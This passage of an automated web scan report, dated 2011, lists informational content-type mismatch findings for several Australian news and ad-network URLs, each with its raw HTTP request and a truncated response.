Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.151.46
X-Cnection: close
Date: Wed, 07 Sep 2011 14:15:26 GMT
Content-Length: 22

Invalid Application ID

21.33. http://www.ntnews.com.au/images/global/icons/arrow-orange.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ntnews.com.au
Path:	/images/global/icons/arrow-orange.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /images/global/icons/arrow-orange.gif HTTP/1.1
Host: www.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sopsview=1

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 07 Sep 2011 14:15:21 GMT
Content-Length: 15
Connection: close
Vary: Accept-Encoding

File not found.

21.34. http://www.ntnews.com.au/scripts/track-call.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ntnews.com.au
Path:	/scripts/track-call.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /scripts/track-call.js HTTP/1.1
Host: www.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6abf5d00eeb2f80e39b0d535c4937117:1288245308"
Last-Modified: Thu, 28 Oct 2010 05:55:08 GMT
Accept-Ranges: bytes
Content-Length: 13
Content-Type: application/x-javascript
Date: Wed, 07 Sep 2011 14:14:53 GMT
Connection: close

TRAKTR.pi();

21.35. http://www.ntnews.com.au/scripts/track-header.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ntnews.com.au
Path:	/scripts/track-header.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /scripts/track-header.js HTTP/1.1
Host: www.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "f39b6c305c9fe1cf041058ea6e3dd7e5:1288245312"
Last-Modified: Thu, 28 Oct 2010 05:55:12 GMT
Accept-Ranges: bytes
Content-Length: 333
Content-Type: application/x-javascript
Date: Wed, 07 Sep 2011 14:14:53 GMT
Connection: close

ndm.page.site = "NTN";
ndm.page.section = section;
ndm.page.type = type;
ndm.page.custom= "";
ndm.page.runads = true;
ndm.page.adstyles = "auto";
ndm.page.hbx.account = "DM580311MAFV";
ndm.page.hbx.ga
...[SNIP]...

21.36. http://www.smh.com.au/action/pingServerAction previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.smh.com.au
Path:	/action/pingServerAction

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /action/pingServerAction?par=660206&type=Index&s=Business&i=&v=317475 HTTP/1.1
Host: www.smh.com.au
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1315422900111; k_visit=1; __utma=251652569.1383434366.1315422949.1315422949.1315422949.1; __utmb=251652569.1.10.1315422949; __utmc=251652569; __utmz=251652569.1315422949.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 07 Sep 2011 14:19:59 GMT
X-Cnection: close
Content-Language: en-AU
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Length: 80
Content-Type: text/html;charset=UTF-8
Expires: Wed, 07 Sep 2011 14:19:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:19:59 GMT
Connection: close
Vary: Accept-Encoding

{
time : "<em>12:18AM</em> Thursday Sep 08, 2011",
people : "1,436"
}

21.37. http://www.smh.com.au/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.smh.com.au
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.smh.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1315422900111; k_visit=1; __utma=251652569.1383434366.1315422949.1315422949.1315422949.1; __utmb=251652569.2.10.1315422949; __utmc=251652569; __utmz=251652569.1315422949.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 15 Feb 2011 03:11:29 GMT
ETag: "1c65690-9b27-49c498540ba40"
Accept-Ranges: bytes
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Length: 39719
Content-Type: text/plain; charset=UTF-8
Date: Wed, 07 Sep 2011 14:20:01 GMT
Connection: close
Vary: Accept-Encoding

............ .!U..V...00.... .h&..wU.. .... .(....{........ .. ............ .h........PNG
.
...IHDR.............\r.f.. .IDATx.....\.u.[..A..@..$A. H....L.I..(..d{-.ZK.g..y..Z..yW......w%.ZK..Ob.E1(
...[SNIP]...

21.38. http://www.themercury.com.au/images/horoscopes-background.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.themercury.com.au
Path:	/images/horoscopes-background.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/horoscopes-background.gif HTTP/1.1
Host: www.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sopsview=1

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "b50e024cd1c112f4afbbb88f79be4e9e:1223801615"
Last-Modified: Sun, 12 Oct 2008 08:53:35 GMT
Accept-Ranges: bytes
Content-Length: 3782
Content-Type: image/gif
Date: Wed, 07 Sep 2011 14:15:35 GMT
Connection: close
X-N: S

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

............................................................................................................<..
...[SNIP]...

21.39. http://www.themercury.com.au/scripts/track-call.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.themercury.com.au
Path:	/scripts/track-call.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /scripts/track-call.js HTTP/1.1
Host: www.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6abf5d00eeb2f80e39b0d535c4937117:1315386315"
Last-Modified: Wed, 07 Sep 2011 09:05:15 GMT
Accept-Ranges: bytes
Content-Length: 13
Content-Type: application/x-javascript
Date: Wed, 07 Sep 2011 14:14:58 GMT
Connection: close

TRAKTR.pi();

21.40. http://www.themercury.com.au/scripts/track-header.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.themercury.com.au
Path:	/scripts/track-header.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /scripts/track-header.js HTTP/1.1
Host: www.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "3320fba53bd1a063dc9876c6bbc8a8d1:1315386321"
Last-Modified: Wed, 07 Sep 2011 09:05:21 GMT
Accept-Ranges: bytes
Content-Length: 260
Content-Type: application/x-javascript
Date: Wed, 07 Sep 2011 14:14:58 GMT
Connection: close

ndm.page.site = "TMRC";
ndm.page.section = section;
ndm.page.custom= "";
ndm.page.hbx.account = "DM561119EPCM";
ndm.page.hbx.gateway = "ths.news.com.au";
ndm.page.hbx.domain = "www.news.com.au";
ndm.p
...[SNIP]...

21.41. http://www.watoday.com.au/action/pingServerAction previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.watoday.com.au
Path:	/action/pingServerAction

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /action/pingServerAction?par=2607520&type=Article&s=WA+News&i=&v=972030 HTTP/1.1
Host: www.watoday.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1315422870964; k_visit=1; __utma=209218509.1580993531.1315422892.1315422892.1315422892.1; __utmb=209218509.1.10.1315422892; __utmc=209218509; __utmz=209218509.1315422892.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 07 Sep 2011 14:30:34 GMT
X-Cnection: close
Content-Language: en-AU
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Length: 78
Content-Type: text/html;charset=UTF-8
Expires: Wed, 07 Sep 2011 14:30:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:30:34 GMT
Connection: close
Vary: Accept-Encoding

{
time : "<em>10:29PM</em> Wednesday Sep 07, 2011",
people : "88"
}

22. Content type is not specified previous
There are 2 instances of this issue:

http://ad.yieldmanager.com/st
http://pcm3.map.pulsemgr.com/uds/pc

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

22.1. http://ad.yieldmanager.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Request

GET /st?ad_type=iframe&ad_size=300x250&site=334050&section_code=14494093&cb=1315404889357362&yrc=&ycg=&yyob=&yprop=au_news&ypos=LREC1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5JknRO1[uD%T4O; pv1="b!!!!)!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!!!!%!?5%!%5XA1![:Z-!#gyo!(_lN~~~~~~=3rv_~~"; ih="b!!!!5!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!#=3rv_!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; vuday1=Ajz6%%)0sJ!!w[/N0FYbNl+WV; BX=ei08qcd75vc4d&b=3&s=8s&t=246; liday1=FA=Er<9:^PpR#?yN0FYbn@M@W

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:57 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:14:57 GMT
Pragma: no-cache
Content-Length: 4808
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

22.2. http://pcm3.map.pulsemgr.com/uds/pc previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pcm3.map.pulsemgr.com
Path:	/uds/pc

Request

GET /uds/pc?ptnr=21280&sig=6f737abf3f6bb5f84a1ad1dc0be05ab8 HTTP/1.1
Host: pcm3.map.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Wed, 07 Sep 2011 14:14:32 GMT
Connection: close

GIF89a.............!.......,...........D..;

Report generated by XSS.CX at Wed Sep 07 14:14:10 GMT-06:00 2011.